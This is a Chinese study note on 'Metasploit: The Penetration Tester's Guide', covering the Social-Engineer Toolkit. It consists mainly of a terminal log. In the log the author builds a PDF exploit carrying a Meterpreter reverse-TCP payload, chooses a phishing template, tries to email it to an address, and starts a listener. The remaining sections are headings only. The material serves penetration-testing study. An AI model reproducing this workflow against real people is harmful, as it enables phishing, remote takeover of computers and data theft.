《Metasploit滲透測試指南》筆記(十二)
來自專欄 Antenna的Linux運維筆記
十、社會工程學工具包
社會工程學工具包(SET)是為了與http://Social-Engineer.org網站同期發布所開發的工具軟體包。網站http://www.social-engineer.org 集中提供了社會工程學的相關教程、技術說明、專業術語以及相關方案的基礎,幫助你掌握能更吧攻擊人腦思維的社會工程學技巧。
攻擊向量是用來獲取信息或取得信息系統訪問權的渠道。SET通過攻擊向量來對攻擊進行分類。(例如:基於Web的攻擊、基於E-mail的攻擊和基於USB的攻擊)。
1.配置SET工具包
我的kali2018可能跟書上的版本不太一樣,這裡先不記錄了。
2.針對性釣魚攻擊向量
root@kali:/# setoolkit[-] New set.config.py file generated on: 2018-09-27 09:12:17.319978[-] Verifying configuration update...[*] Update verified, config timestamp is: 2018-09-27 09:12:17.319978[*] SET is using the new config, no need to restart :::=== :::===== :::==== ::: ::: :::==== ===== ====== === === === === ====== ======== ===[---] The Social-Engineer Toolkit (SET) [---][---] Created by: David Kennedy (ReL1K) [---] Version: 7.7.9 Codename: Blackout[---] Follow us on Twitter: @TrustedSec [---][---] Follow me on Twitter: @HackingDave [---][---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Its easy to update using the PenTesters Framework! (PTF)Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkitset> 1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMMMss ssMMMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMyy yyMMMMMMMMMMMM XXXX MMMMMMMMyy yyMMMMMMMM XXXX MMMMMy yMMMMM XXXX MMMy yMMM XXXX Mh hM XXXX - - XXXX XXXX :: :: XXXX MMhh. ..hhhhhh.. ..hhhhhh.. .hhMM XXXX MMMMMh ..hhMMMMMMMMMMhh. .hhMMMMMMMMMMhh.. hMMMMM XXXX ---MMM .hMMMMdd:::dMMMMMMMhh.. ..hhMMMMMMMd:::ddMMMMh. MMM--- XXXX MMMMMM MMmm mmMMMMMMMMyy. .yyMMMMMMMMmm mmMM MMMMMM XXXX ---mMM mmMMMMMMMM MMMMMMMMmm MMm--- XXXX yyyym . mMMMMm mMMMMm . myyyy XXXX mm .y ..yyyyy.. ..yyyyy.. y. mm XXXX MN .sMMMMMMMMMss. . . .ssMMMMMMMMMs. NM XXXX N` MMMMMMMMMMMMMN M M NMMMMMMMMMMMMM `N XXXX + .sMNNNNNMMMMMN+ `N N` +NMMMMMNNNNNMs. + XXXX o+++ ++++Mo M M oM++++ +++o XXXX oo oo XXXX oM oo oo Mo XXXX oMMo M M oMMo XXXX +MMMM s s MMMM+ XXXX +MMMMM+ +++NNNN+ +NNNN+++ +MMMMM+ XXXX +MMMMMMM+ ++NNMMMMMMMMN+ +NMMMMMMMMNN++ +MMMMMMM+ XXXX MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM XXXX yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy XXXX m yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy m XXXX MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM XXXX MMMm .yyMMMMMMMMMMMMMMMM MMMMMMMMMM MMMMMMMMMMMMMMMMyy. mMMM XXXX MMMMd hhhhh odddo obbbo hhhh dMMMM XXXX MMMMMd hMMMMMMMMMMddddddMMMMMMMMMMh dMMMMM XXXX MMMMMMd hMMMMMMMMMMMMMMMMMMMMMMh dMMMMMM XXXX MMMMMMM- ddMMMMMMMMMMMMMMdd -MMMMMMM XXXX MMMMMMMM ::dddddddd:: MMMMMMMM XXXX MMMMMMMM- -MMMMMMMM XXXX MMMMMMMMM MMMMMMMMM XXXX MMMMMMMMMy yMMMMMMMMM XXXX MMMMMMMMMMy. .yMMMMMMMMMM XXXX MMMMMMMMMMMMy. .yMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMy. .yMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMMMs. .sMMMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMMMMMss. .... .ssMMMMMMMMMMMMMMMMMM XXXX MMMMMMMMMMMMMMMMMMMMNo oNNNNo oNMMMMMMMMMMMMMMMMMMMM XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .o88o. o8o . 888 `" `" .o8 o888oo .oooo.o .ooooo. .ooooo. oooo .ooooo. .o888oo oooo ooo 888 d88( "8 d88 `88b d88 `"Y8 `888 d88 `88b 888 `88. .8 888 `"Y88b. 888 888 888 888 888ooo888 888 `88..8 888 o. )88b 888 888 888 .o8 888 888 .o 888 . `888 o888o 8""888P `Y8bod8P `Y8bod8P o888o `Y8bod8P "888" d8 .o...P `XER0[---] The Social-Engineer Toolkit (SET) [---][---] Created by: David Kennedy (ReL1K) [---] Version: 7.7.9 Codename: Blackout[---] Follow us on Twitter: @TrustedSec [---][---] Follow me on Twitter: @HackingDave [---][---] Homepage: https://www.trustedsec.com [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. Join us on irc.freenode.net in channel #setoolkit The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Its easy to update using the PenTesters Framework! (PTF)Visit https://github.com/trustedsec/ptf to update all your tools! Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu.set> 1 The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is in- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON. There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy! 1) Perform a Mass Email Attack 2) Create a FileFormat Payload 3) Create a Social-Engineering Template 99) Return to Main Menuset:phishing>1/usr/share/metasploit-framework/ Select the file format exploit you want. The default is the PDF embedded EXE. ********** PAYLOADS ********** 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 2) SET Custom Written Document UNC LM SMB Capture Attack 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01) 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 7) Adobe Flash Player "Button" Remote Code Execution 8) Adobe CoolType SING Table "uniqueName" Overflow 9) Adobe Flash Player "newfunction" Invalid Pointer Use 10) Adobe Collab.collectEmailInfo Buffer Overflow 11) Adobe Collab.getIcon Buffer Overflow 12) Adobe JBIG2Decode Memory Corruption Exploit 13) Adobe PDF Embedded EXE Social Engineering 14) Adobe util.printf() Buffer Overflow 15) Custom EXE to VBA (sent via RAR) (RAR required) 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 17) Adobe PDF Embedded EXE Social Engineering (NOJS) 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 19) Apple QuickTime PICT PnSize Buffer Overflow 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 21) Adobe Reader u3D Memory Corruption Vulnerability 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)set:payloads>10 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreterset:payloads>2set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.210]: set:payloads> Port to connect back on [443]:[-] Defaulting to port 443...[*] All good! The directories were created.[-] Generating fileformat exploit...[*] Waiting for payload generation to complete (be patient, takes a bit)...[*] Payload creation complete.[*] All payloads get sent to the template.pdf directory[*] If you are using GMAIL - you will need to need to create an application password: https://support.google.com/accounts/answer/6010255?hl=en[-] As an added bonus, use the file-format creator in SET to create your attachment. Right now the attachment will be imported with filename of template.whatever Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I dont care. 2. Rename the file, I want to be cool.set:phishing>1[*] Keeping the filename and moving on. Social Engineer Toolkit Mass E-Mailer There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list. What do you want to do: 1. E-Mail Attack Single Email Address 2. E-Mail Attack Mass Mailer 99. Return to main menu. set:phishing>1 Do you want to use a predefined template or craft a one time email template. 1. Pre-Defined Template 2. One-Time Use Email Templateset:phishing>1[-] Available templates:1: Status Report2: How long has it been?3: Order Confirmation4: WOAAAA!!!!!!!!!! This is crazy...5: Strange internet usage from your computer6: New Update7: Baby Pics8: Computer Issue9: Have you seen this?10: Dan Browns Angels & Demonsset:phishing>2set:phishing> Send email to:lilyef2000@163.com 1. Use a gmail Account for your email attack. 2. Use your own server or open relayset:phishing>2set:phishing> From address (ex: moo@example.com):xxxxxx@163.comset:phishing> The FROM NAME user will see:xxxxxxset:phishing> Username for open-relay [blank]:Password for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.163.comset:phishing> Port number for the SMTP server [25]:set:phishing> Flag this message/s as high priority? [yes|no]:noset:phishing> Does your server support TLS? [yes|no]:no[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.Press {return} to view error message.(553, authentication is required,163 smtp2,DNGowACn_zFc2Kxb7l0tAA--.106S5 1538054240, lilyef2000@163.com)[*] SET has finished delivering the emailsset:phishing> Setup a listener [yes|no]:yes .:okOOOkdc cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO. cOOOOOOO.MMM.OOc.MMMMMoOO.MMM,OOOOOOOc oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl ;OOOOMMM.OOOO.MMM:OOOO.MMM;OOOO; .dOOoWM.OOOOocccxOOOO.MXxOOd. ,kOlM.OOOOOOOOOOOOO.MdOk, :kk;.OOOOOOOOOOOOO.;Ok: ;kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, . =[ metasploit v4.17.14-dev ]+ -- --=[ 1809 exploits - 1030 auxiliary - 313 post ]+ -- --=[ 539 payloads - 42 encoders - 10 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ][*] Processing /root/.set//meta_config for ERB directives.resource (/root/.set//meta_config)> use exploit/multi/handlerresource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpresource (/root/.set//meta_config)> set LHOST 192.168.1.210LHOST => 192.168.1.210resource (/root/.set//meta_config)> set LPORT 443LPORT => 443resource (/root/.set//meta_config)> set ENCODING shikata_ga_naiENCODING => shikata_ga_nairesource (/root/.set//meta_config)> set ExitOnSession falseExitOnSession => falseresource (/root/.set//meta_config)> exploit -j[*] Exploit running as background job 0.[*] Starting persistent handler(s)...[*] Started reverse TCP handler on 192.168.1.210:443 msf exploit(multi/handler) >
需要目標機器上安裝有低版本存在漏洞的Adobe Acrobat軟體
需要配置相應的環境
3.Web攻擊向量
(1)Java Applet
(2)客戶端Web攻擊
(3)用戶名和密碼獲取
(4)標籤頁劫持攻擊(Tabnabbing)
(5)中間人攻擊
(6)網頁劫持
(7)綜合多重攻擊方法
4.傳染性媒體生成器
5.USB HID攻擊向量
6.SET的其他特性
7.展望
像SET之類的工具對攻擊者都是非常有用的,但是作為一個專業的滲透測試者,你永遠要記住,你的技術能力取決於創新力和你駕馭困難與挑戰的能力。SET可以幫助你攻擊目標,但是最終,如果你失敗了,很有可能是由於你自己缺乏足夠的創新能力。
推薦閱讀: